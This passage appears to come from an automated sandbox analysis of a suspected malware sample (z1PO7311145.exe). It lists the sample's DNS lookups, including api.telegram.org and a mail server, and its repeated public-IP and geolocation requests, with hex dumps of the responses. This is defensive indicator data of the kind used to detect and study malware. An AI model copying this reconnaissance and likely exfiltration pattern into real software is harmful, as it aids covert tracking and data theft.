                                                                                    Oct 7, 2024 15:32:28.585696936 CEST53653531.1.1.1192.168.2.7
                                                                                    Oct 7, 2024 15:32:53.814888000 CEST5363920162.159.36.2192.168.2.7
                                                                                    Oct 7, 2024 15:32:54.524446964 CEST53525241.1.1.1192.168.2.7

                                                                                    DNS Queries

                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Oct 7, 2024 15:32:08.759109020 CEST192.168.2.71.1.1.10x599Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                    Oct 7, 2024 15:32:10.608319998 CEST192.168.2.71.1.1.10x6a1aStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                    Oct 7, 2024 15:32:21.918437004 CEST192.168.2.71.1.1.10xcfaeStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                    Oct 7, 2024 15:32:28.489160061 CEST192.168.2.71.1.1.10xd10dStandard query (0)mail.electradubai.comA (IP address)IN (0x0001)false

                                                                                    DNS Answers

                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Oct 7, 2024 15:32:08.766763926 CEST1.1.1.1192.168.2.70x599No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                    Oct 7, 2024 15:32:08.766763926 CEST1.1.1.1192.168.2.70x599No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                    Oct 7, 2024 15:32:08.766763926 CEST1.1.1.1192.168.2.70x599No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                    Oct 7, 2024 15:32:08.766763926 CEST1.1.1.1192.168.2.70x599No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                    Oct 7, 2024 15:32:08.766763926 CEST1.1.1.1192.168.2.70x599No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                    Oct 7, 2024 15:32:08.766763926 CEST1.1.1.1192.168.2.70x599No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                    Oct 7, 2024 15:32:10.618717909 CEST1.1.1.1192.168.2.70x6a1aNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                    Oct 7, 2024 15:32:10.618717909 CEST1.1.1.1192.168.2.70x6a1aNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                    Oct 7, 2024 15:32:21.925395012 CEST1.1.1.1192.168.2.70xcfaeNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                    Oct 7, 2024 15:32:28.585696936 CEST1.1.1.1192.168.2.70xd10dNo error (0)mail.electradubai.com192.250.231.25A (IP address)IN (0x0001)false

                                                                                    HTTP Request Dependency Graph

                                                                                    • reallyfreegeoip.org
                                                                                    • api.telegram.org
                                                                                    • checkip.dyndns.org

                                                                                    HTTP Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.749699158.101.44.242806492C:\Users\user\Desktop\z1PO7311145.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 7, 2024 15:32:08.782037973 CEST151OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Connection: Keep-Alive
                                                                                    Oct 7, 2024 15:32:10.419218063 CEST320INHTTP/1.1 200 OK
                                                                                    Date: Mon, 07 Oct 2024 13:32:09 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 103
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: f68e09b5ca41aa72a69189561720b207
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                    Oct 7, 2024 15:32:10.419576883 CEST320INHTTP/1.1 200 OK
                                                                                    Date: Mon, 07 Oct 2024 13:32:09 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 103
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: f68e09b5ca41aa72a69189561720b207
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                    Oct 7, 2024 15:32:10.419810057 CEST320INHTTP/1.1 200 OK
                                                                                    Date: Mon, 07 Oct 2024 13:32:09 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 103
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: f68e09b5ca41aa72a69189561720b207
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                    Oct 7, 2024 15:32:10.420491934 CEST320INHTTP/1.1 200 OK
                                                                                    Date: Mon, 07 Oct 2024 13:32:09 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 103
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: f68e09b5ca41aa72a69189561720b207
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                    Oct 7, 2024 15:32:10.423350096 CEST127OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Oct 7, 2024 15:32:10.573785067 CEST320INHTTP/1.1 200 OK
                                                                                    Date: Mon, 07 Oct 2024 13:32:10 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 103
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: 83edd1acd73ddfbb01d7e71313c0b0fe
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                    Oct 7, 2024 15:32:11.255348921 CEST127OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Oct 7, 2024 15:32:11.417453051 CEST320INHTTP/1.1 200 OK
                                                                                    Date: Mon, 07 Oct 2024 13:32:11 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 103
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: 00c422b3e4ff372288802364fcc1a48f
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1192.168.2.749702158.101.44.242806492C:\Users\user\Desktop\z1PO7311145.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 7, 2024 15:32:12.036933899 CEST127OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Oct 7, 2024 15:32:12.585233927 CEST320INHTTP/1.1 200 OK
                                                                                    Date: Mon, 07 Oct 2024 13:32:12 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 103
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: 5e6d0f1195edd27d2c18c5549e37bab0
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2192.168.2.749704158.101.44.242806492C:\Users\user\Desktop\z1PO7311145.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 7, 2024 15:32:13.190700054 CEST127OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Oct 7, 2024 15:32:13.739020109 CEST320INHTTP/1.1 200 OK
                                                                                    Date: Mon, 07 Oct 2024 13:32:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 103
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: bc7d8acfaad96689f92be576b2069d74
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3192.168.2.749706158.101.44.242806492C:\Users\user\Desktop\z1PO7311145.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 7, 2024 15:32:14.336594105 CEST127OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Oct 7, 2024 15:32:14.895538092 CEST320INHTTP/1.1 200 OK
                                                                                    Date: Mon, 07 Oct 2024 13:32:14 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 103
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: c08aa67462b5f128f3d6b6c25e9dbe91
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4192.168.2.749708158.101.44.242806492C:\Users\user\Desktop\z1PO7311145.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 7, 2024 15:32:15.903928041 CEST151OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Connection: Keep-Alive
                                                                                    Oct 7, 2024 15:32:16.472619057 CEST320INHTTP/1.1 200 OK
                                                                                    Date: Mon, 07 Oct 2024 13:32:16 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 103
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: 3373d939d9eb039966a1ef7bc245cce7
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5192.168.2.749710158.101.44.242806492C:\Users\user\Desktop\z1PO7311145.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 7, 2024 15:32:17.095774889 CEST151OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Connection: Keep-Alive
                                                                                    Oct 7, 2024 15:32:17.632886887 CEST320INHTTP/1.1 200 OK
                                                                                    Date: Mon, 07 Oct 2024 13:32:17 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 103
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: 41bb95fd0065788b741ad2cf4b77b333
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6192.168.2.749712158.101.44.242806492C:\Users\user\Desktop\z1PO7311145.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 7, 2024 15:32:18.249037027 CEST151OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Connection: Keep-Alive
                                                                                    Oct 7, 2024 15:32:19.017308950 CEST320INHTTP/1.1 200 OK
                                                                                    Date: Mon, 07 Oct 2024 13:32:18 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 103
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: be4b9922eb63d0c2ab41089abfab3b32
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                    Oct 7, 2024 15:32:19.018198013 CEST320INHTTP/1.1 200 OK
                                                                                    Date: Mon, 07 Oct 2024 13:32:18 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 103
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: be4b9922eb63d0c2ab41089abfab3b32
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7192.168.2.749715158.101.44.242806492C:\Users\user\Desktop\z1PO7311145.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 7, 2024 15:32:19.671669960 CEST151OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Connection: Keep-Alive
                                                                                    Oct 7, 2024 15:32:20.217713118 CEST320INHTTP/1.1 200 OK
                                                                                    Date: Mon, 07 Oct 2024 13:32:20 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 103
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: db3c6dc9927fdbe91f73b2b51ba446be
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                    HTTPS Proxied Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.749700188.114.97.34436492C:\Users\user\Desktop\z1PO7311145.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-07 13:32:11 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                    Host: reallyfreegeoip.org
                                                                                    Connection: Keep-Alive
                                                                                    2024-10-07 13:32:11 UTC712INHTTP/1.1 200 OK
                                                                                    Date: Mon, 07 Oct 2024 13:32:11 GMT
                                                                                    Content-Type: application/xml
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    access-control-allow-origin: *
                                                                                    vary: Accept-Encoding
                                                                                    Cache-Control: max-age=86400
                                                                                    CF-Cache-Status: HIT
                                                                                    Age: 64266
                                                                                    Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Uv%2Fzm%2FvsCPWZgml5MBW7k2XjelLgFJ6iXJU8UHIjribBc5yEyVlLOcf%2FqigxaCUePE6rwQza%2FhimG8T%2BX0eXC65slqwpSvpThrJApBmNgFaW%2F5QzKut7SSTwddnNbAsqNPSGldFh"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8cee4179f90e7287-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-10-07 13:32:11 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                    2024-10-07 13:32:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1192.168.2.749701188.114.97.34436492C:\Users\user\Desktop\z1PO7311145.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-07 13:32:11 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                    Host: reallyfreegeoip.org
                                                                                    2024-10-07 13:32:12 UTC680INHTTP/1.1 200 OK
                                                                                    Date: Mon, 07 Oct 2024 13:32:11 GMT
                                                                                    Content-Type: application/xml
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    access-control-allow-origin: *
                                                                                    vary: Accept-Encoding
                                                                                    Cache-Control: max-age=86400
                                                                                    CF-Cache-Status: HIT
                                                                                    Age: 64266
                                                                                    Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FWKifVSljXA8ns2kuuLVUvaU1uYm0P0jnuMmUOw0%2BK6N8U3%2BbZ7UUEnRWAQgUPa2WPm9nB0nQmHd4rJiZSDpSaW%2FJ5eDtTy%2FaOuobu5VMvFcvq3jRFSrjc7p6ssFDBYdZmkPgA0X"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8cee417eb839c413-EWR
                                                                                    2024-10-07 13:32:12 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                    2024-10-07 13:32:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2192.168.2.749703188.114.97.34436492C:\Users\user\Desktop\z1PO7311145.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-07 13:32:13 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                    Host: reallyfreegeoip.org
                                                                                    Connection: Keep-Alive
                                                                                    2024-10-07 13:32:13 UTC678INHTTP/1.1 200 OK
                                                                                    Date: Mon, 07 Oct 2024 13:32:13 GMT
                                                                                    Content-Type: application/xml
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    access-control-allow-origin: *
                                                                                    vary: Accept-Encoding
                                                                                    Cache-Control: max-age=86400
                                                                                    CF-Cache-Status: HIT
                                                                                    Age: 64268
                                                                                    Last-Modified: Sun, 06 Oct 2024 19:41:05 GMT
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ipacYJd1X8pPIib1tlYXdCxAKVqP4M%2FGhkR%2FPXgybFyuvHeCAZ9Q4cNbUfKkvznbd%2F4sXQXRWRwS3wtKHq6INxRc52DF4jOESEbzkPuHvZGjXFUAqH9S1ebtt2RgNQvH%2FayVDwcT"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8cee4185ffffc34e-EWR
